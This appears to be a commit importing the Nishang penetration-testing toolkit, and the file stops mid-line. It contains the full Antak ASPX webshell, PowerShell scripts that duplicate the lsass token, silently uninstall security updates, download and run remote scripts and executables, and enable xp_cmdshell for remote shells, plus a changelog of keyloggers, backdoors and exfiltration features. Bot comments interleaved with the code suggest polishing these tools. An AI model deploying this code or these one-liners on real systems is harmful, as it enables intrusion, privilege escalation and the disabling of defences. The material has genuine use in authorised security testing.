Commit d0cf1ec3 authored by Devon Kearns's avatar Devon Kearns

Imported Upstream version 0.3.4

Antak is a webshell written in C#.Net which utilizes powershell.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%--Antak - A Webshell which utilizes powershell.--%>
<script Language="c#" runat="server">
protected override void OnInit(EventArgs e)
{
output.Text = @"Welcome to Antak - A Webshell in Powershell
Use help for more details.
Use clear to clear the screen.";
}
string do_ps(string arg)
{
//This section based on cmdasp webshell by http://michaeldaw.org
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "powershell.exe";
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void ps(object sender, System.EventArgs e)
{
string option = console.Text.ToLower();
if (option.Equals("help"))
{
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
while using commands (like changing current directory or running session aware scripts).
Executing PowerShell scripts on the target -
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
2. Use powershell one-liner (example below) for download & execute in the command box.
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
3. By uploading the script to the target and executing it.
4. Make the script a semi-colon separated one-liner.
Files can be uploaded and downloaded using the respective buttons.
Uploading a file -
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
(OS temporary directory like C:\Windows\Temp may be writable.)
Then use Browse and Upload buttons to upload file to that path.
Downloading a file -
To download a file enter the actual path on the server in command textbox.
Then click on Download button.
Antak is a part of Nishang and updates could be found here:
https://github.com/samratashok/nishang
A detailed blog post on Antak could be found here
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
";
console.Text = string.Empty;
console.Focus();
}
else if (option.Equals("clear"))
{
output.Text = string.Empty;
console.Text = string.Empty;
console.Focus();
}
else
{
output.Text += "\nPS> " + console.Text + "\n" + do_ps(console.Text);
console.Text = string.Empty;
console.Focus();
}
}
void execcommand(string cmd)
{
output.Text += "PS> " + "\n" + do_ps(cmd);
console.Text = string.Empty;
console.Focus();
}
void base64encode(object sender, System.EventArgs e)
{
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
string contents = console.Text;
// Compress Script
MemoryStream ms = new MemoryStream();
DeflateStream cs = new DeflateStream(ms, CompressionMode.Compress);
StreamWriter sw = new StreamWriter(cs, ASCIIEncoding.ASCII);
sw.WriteLine(contents);
sw.Close();
string code = Convert.ToBase64String(ms.ToArray());
string command = "Invoke-Expression $(New-Object IO.StreamReader (" +
"$(New-Object IO.Compression.DeflateStream (" +
"$(New-Object IO.MemoryStream (," +
"$([Convert]::FromBase64String('" + code + "')))), " +
"[IO.Compression.CompressionMode]::Decompress))," +
" [Text.Encoding]::ASCII)).ReadToEnd();";
execcommand(command);
}
protected void uploadbutton_Click(object sender, EventArgs e)
{
if (upload.HasFile)
{
try
{
string filename = Path.GetFileName(upload.FileName);
upload.SaveAs(console.Text + "\\" + filename);
output.Text = "File uploaded to: " + console.Text + "\\" + filename;
}
catch (Exception ex)
{
output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message;
}
}
}
protected void downloadbutton_Click(object sender, EventArgs e)
{
try
{
Response.ContentType = "application/octet-stream";
Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text);
Response.TransmitFile(console.Text);
Response.End();
}
catch (Exception ex)
{
output.Text = ex.ToString();
}
}
</script>
<HTML>
<HEAD>
<title>Antak Webshell</title>
</HEAD>
<body bgcolor="#808080">
<div>
<form id="Form1" method="post" runat="server" style="background-color: #808080">
<div style="text-align:center; resize:vertical">
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
</div>
<div style="width: 1100px; text-align:center">
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
<asp:FileUpload ID="upload" runat="server"/>
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
</div>
</form>
</div>
</body>
</HTML>
\ No newline at end of file
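Review bot: `ps` compares the command with `console.Text.ToLower()` followed by `Equals`, which is a culture-sensitive comparison and allocates a second string; `if (option.Equals("help", StringComparison.OrdinalIgnoreCase))` on the raw text avoids the culture dependence. In `do_ps` the `Process` returned by `Process.Start` is never disposed, so the handle lives until the finalizer runs; wrapping it as `using (Process p = Process.Start(psi)) { ... }` releases it when the read completes. None of the handlers states what it expects in `console`; a one-line comment such as `// console holds either a built-in keyword (help/clear) or text handed verbatim to powershell.exe` at the top of `ps` would document the contract the three branches rely on.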
0.3.5
- Added Antak Webshell.
0.3.4
- Minor improvements in StringtoBase64.ps1
- Fixed a typo in Firelistener. Client port was not being displayed.
- All the scripts could be run using "dot source" now.
- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
- Removed exfiltration support for tinypaste.
- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
- Added Nishang.psm1
- Added Do-Exfiltration.ps1.
- Added Add-Exfiltration.ps1.
- Added Invoke-Decode.ps1.
- Removed Browse_Accept_Applet.ps1
0.3.3
- Minor bug fix in Copy-VSS.ps1
- Bug fix in Keylogger.ps1. It should log keys from a remote shell now (not powershell remoting).
0.3.2.2
- Download_Execute_PS.ps1 can now download and execute a Powershell script without writing it to disk.
- Execute_OnTime.ps1 and HTTP-Backdoor.ps1 executed the payload without downloading a file to disk.
- Fixed help in Brute-Force function in Powerpreter.
- Execute-OnTime, HTTP-Backdoor and Download-Execute-PS in Powerpreter now execute powershell scripts without downloading a file to disk.
- Added Firebuster.ps1 and Firelistener.ps1
0.3.2.1
- Fixed help and function name in Brute-Force.ps1
0.3.2
- Added Persistence to Keylogger, DNS_TXT_Pwnage, Execute_OnTime, HTTP-Backdoor and Powerpreter.
- Scirpts are now arranged in different directories.
- Added Add-Persistence.ps1 and Remove-Persistence.ps1
- Fixed minor bugs in scripts which use two parameterset.
- Invoke-NinjaCopy has been removed.
0.3.1
- Pivot now accepts multiple computers as input.
- Added Use-Session to interact with sessions created using Pivot.
0.3.0
- Added Powerpreter
- Added Execute-DNSTXT-Code
- Bug fix in Create-MultipleSessions.
- Changes to StringToBase64. It now supports Unicode encoding which makes it usable with -Encodedcommand.
- More Changes to StringToBase64. Now a file can be converted.
- Added Copy-VSS
- Information_Gather shows output in better format now.
- Information_Gather renamed to Get-Information.
- Wait for command renamed to HTTP-Backdoor.
- Time_Execution renamed Execute-OnTime
- Invoke-PingSweep renamed to Port-Scan
- Invoke-Medusa renamed to Brute-Force
0.2.9
- Run-EXEonRemote now accepts custom arguments for the executable.
- More examples added to the Keylogger.
0.2.8
- Fixed issues while using Get-LSASecret, Get-PassHashes, Get-WLAN-Keys and Information_Gather while using with Powershell v2
0.2.7
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
0.2.6
- Added Create-MultipleSessions script.
- Added Run-EXEonRemote script.
0.2.5
- Added Get-WLAN-Keys payload.
- Added Remove-Update payload.
- Fixed help in Credentials.ps1
- Minor changes in Donwload_Execute and Information_Gather.
0.2.1
- Added Execute-Command-MSSQL payload.
- Removed Get-SqlSysLogin payload
- Fixed a bug in Credentials.ps1
0.2.0
- Removed hard coded strings from DNS TXT Pwnage payload.
- Information Gather now pastes data base64 encoded, does not trigger pastebin spam filter anymore.
- Credentials payload now validates both local and AD crdentials. If creds entered could not be validated locally or at AD, credential prompt is shown again.
- Base64ToString now asks for a file containing base64 string. To provide a string in place of file use "-IsString" parameter.
- Browse_Accept_Applet now handles prompts for both 32 bit and 64 bit Internet Explorer. The wait time for the applet to load has also been increased .
- Added Enable_DuplicateToken payload.
- Added Get-LSASecret payload.
- Added Get-SqlSysLogin payload.
- Added Invoke-Medusa payload.
- Added Invoke-PingSweep payload.
0.1.1
- Fixed a bug in Parse_Keys. The function Parse_Keys was not being called.
- Changed help in Wait_For_Command.ps1
- Fixed a bug in Wait_For_Command. $MagicString was not being used instead a fixed string was matched to the result of $checkurl
- Removed delay in the credentials payload's prompt. Now the prompt asking for credentials will keep appearing instantly if nothing is entered.
- Added CHANGELOG to repo
- Removed hard coded credentials from Credentials.ps1 :| and edited the code to accept user input.
\ No newline at end of file
<#
.SYNOPSIS
Nishang payload which duplicates the Access token of lsass and sets it in the current process thread.
.DESCRIPTION
This payload duplicates the Access token of lsass and sets it in the current process thread.
The payload must be run with elevated permissions.
.EXAMPLE
PS > Enable-DuplicateToken
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Enable-DuplicateToken
{
[CmdletBinding()]
param()
$signature = @"
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public const int SE_PRIVILEGE_ENABLED = 0x00000002;
public const int TOKEN_QUERY = 0x00000008;
public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000;
public const UInt32 STANDARD_RIGHTS_READ = 0x00020000;
public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001;
public const UInt32 TOKEN_DUPLICATE = 0x0002;
public const UInt32 TOKEN_IMPERSONATE = 0x0004;
public const UInt32 TOKEN_QUERY_SOURCE = 0x0010;
public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040;
public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080;
public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100;
public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY);
public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID);
public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege";
public const int ANYSIZE_ARRAY = 1;
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
public UInt32 LowPart;
public UInt32 HighPart;
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES {
public LUID Luid;
public UInt32 Attributes;
}
public struct TOKEN_PRIVILEGES {
public UInt32 PrivilegeCount;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)]
public LUID_AND_ATTRIBUTES [] Privileges;
}
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int
SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetThreadToken(
IntPtr PHThread,
IntPtr Token
);
[DllImport("advapi32.dll", SetLastError=true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle,
UInt32 DesiredAccess, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
[DllImport("kernel32.dll", ExactSpelling = true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
"@
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
Write-Warning "Run the Command as an Administrator"
Break
}
Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv
$adjPriv = [AdjPriv.AdjPriv]
[long]$luid = 0
$tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid
$tokPriv1Luid.Count = 1
$tokPriv1Luid.Luid = $luid
$tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED
$retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)
[IntPtr]$htoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken)
$tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES
$retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
Break
}
$process = (Get-Process -Name lsass)
#$process.name
[IntPtr]$hlsasstoken = [IntPtr]::Zero
$retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken)
[IntPtr]$dulicateTokenHandle = [IntPtr]::Zero
$retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle)
$retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle)
if(-not($retVal)) {
[System.Runtime.InteropServices.marshal]::GetLastWin32Error()
}
}
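Review bot: The return values of `LookupPrivilegeValue`, `OpenProcessToken` and `DuplicateToken` are each assigned to `$retVal` and then overwritten without being tested, so a failed lookup or a zero `$hlsasstoken` is only noticed, if at all, at the final `SetThreadToken` check; each call should be followed by `if (-not $retVal) { [System.Runtime.InteropServices.Marshal]::GetLastWin32Error(); return }`. `Break` outside a loop (after the administrator check and after `AdjustTokenPrivileges`) does not merely leave the function — in PowerShell it propagates to the caller's enclosing loop or terminates the script — so `return` is the intended control flow there. `$tokenPrivileges` is created and never used, and `$dulicateTokenHandle` is misspelled. The Win32 error code is emitted to the pipeline as a bare number; `Write-Error "SetThreadToken failed: $([System.Runtime.InteropServices.Marshal]::GetLastWin32Error())"` would make the failure legible.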
<#
.SYNOPSIS
Nishang Payload which silently removes updates for a target machine.
.DESCRIPTION
This payload removes updates from a target machine. This could be
used to remove all updates, all security updates or a particular update.
.PARAMETER KBID
THE KBID of update you want to remove. All and Security are also validd.
.EXAMPLE
PS > Remove-Update All
This removes all updates from the target.
.EXAMPLE
PS > Remove-Update Security
This removes all security updates from the target.
.EXAMPLE
PS > Remove-Update KB2761226
This removes KB2761226 from the target.
.LINK
http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/
https://github.com/samratashok/nishang
#>
function Remove-Update {
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$KBID
)
$HotFixes = Get-HotFix
foreach ($HotFix in $HotFixes)
{
if ($KBID -eq $HotFix.HotfixId)
{
$KBID = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart"
Write-Host "Removing $KBID from the target."
Invoke-Expression $RemovalCommand
break
}
if ($KBID -match "All")
{
$KBNumber = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart"
Write-Host "Removing update $KBNumber from the target."
Invoke-Expression $RemovalCommand
}
if ($KBID -match "Security")
{
if ($HotFix.Description -match "Security")
{
$KBSecurity = $HotFix.HotfixId.Replace("KB", "")
$RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart"
Write-Host "Removing Security Update $KBSecurity from the target."
Invoke-Expression $RemovalCommand
}
}
while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0)
{
Start-Sleep 3
Write-Host "Waiting for update removal to finish ..."
}
}
}
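Review bot: `Remove-Update` tests the keywords with `$KBID -match "All"` and `$KBID -match "Security"`, a case-insensitive regex substring match, so any argument that merely contains those letters walks every installed hotfix and uninstalls it; since the help already fixes `All` and `Security` as the only keywords, the parameter should be constrained, e.g. `[ValidatePattern('^(All|Security|KB\d+)$')]`, or the tests should be `$KBID -eq "All"` / `$KBID -eq "Security"`. The uninstall is run through `Invoke-Expression` on an interpolated string; `& wusa.exe /uninstall "/kb:$KBNumber" /quiet /norestart` invokes it without re-parsing the command line. The `while` loop that polls for wusa sits inside the `foreach`, so it also runs on iterations that started nothing, which the code does not comment on.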
<#
.SYNOPSIS
Nishang Payload which downloads and executes a powershell script.
.DESCRIPTION
This payload downloads a powershell script from specified URL and then executes it on the target.
.PARAMETER ScriptURL
The URL from where the powershell script would be downloaded.
.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x
.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript -nodownload
The above command does not dowload the script file to disk.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download-Execute-PS
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ScriptURL,
[Parameter(Position = 1)]
[Switch]
$nodownload
)
if ($nodownload -eq $true)
{
Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"));
}
else
{
$webclient = New-Object System.Net.WebClient
$file1 = "$env:temp\deps.ps1"
$webclient.DownloadFile($ScriptURL,"$file1")
$script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
$pastevalue
}
}
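Review bot: `$nodownload` is a `[Switch]`, so `if ($nodownload -eq $true)` is the long form of `if ($nodownload)`. `$script:pastevalue` is assigned at script scope and then read back as `$pastevalue`, which leaks a variable into the caller's scope for no reason; a plain local, `$result = powershell.exe ...; $result`, keeps the same output. The help does not say where the script is written when the switch is absent; adding a `.NOTES` line stating that without `-nodownload` the script is saved as `$env:temp\deps.ps1` before execution documents the side effect a reader of the help cannot otherwise see.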
<#
.SYNOPSIS
Nishang Payload to download an executable in text format, convert it to executable and execute.
.DESCRIPTION
This payload downloads an executable in text format, converts it to executable and execute.
Use exetotext.ps1 script to change an executable to text
.PARAMETER URL
The URL from where the file would be downloaded.
.EXAMPLE
PS > Download_Execute http://example.com/file.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download_Execute
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL
)
$webclient = New-Object System.Net.WebClient
[string]$hexformat = $webClient.DownloadString($URL)
[Byte[]] $temp = $hexformat -split ' '
[System.IO.File]::WriteAllBytes("$env:temp\svcmondr.exe", $temp)
start-process -nonewwindow "$env:temp\svcmondr.exe"
}
<#
.SYNOPSIS
Nishang payload which could be used to execute commands remotely on a MS SQL server.
.DESCRIPTION
This payload needs a valid administrator username and password on remote SQL server.
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
or a cmd shell on the target.
.PARAMETER ComputerName
Enter CopmuterName or IP Address of the target SQL server.
.PARAMETER UserName
Enter a UserName for a SQL server administrator account.
.PARAMETER Password
Enter the Password for the account.
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234
.EXAMPLE
PS> Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234
.LINK
http://www.labofapenetrationtester.com/2012/12/command-execution-on-ms-sql-server-using-powershell.html
https://github.com/samratashok/nishang
.NOTES
Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
http://www.truesec.com
#>
function Execute-Command-MSSQL {
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
[Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
[string]
$ComputerName,
[parameter(Mandatory = $true, Position = 1)]
[string]
$UserName,
[parameter(Mandatory = $true, Position = 2)]
[string]
$Password
)
Try{
function Make-Connection ($query)
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Connection
$Command.CommandText = $query
$Reader = $Command.ExecuteReader()
$Connection.Close()
}
"Connecting to $ComputerName..."
start-sleep 3
Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
"`nEnabling XP_CMDSHELL...`n"
start-sleep 3
Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
$shell = read-host
while($payload -ne "exit")
{
$Connection = New-Object System.Data.SQLClient.SQLConnection
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
$Connection.Open()
$Command = New-Object System.Data.SQLClient.SQLCommand
$Command.Connection = $Conne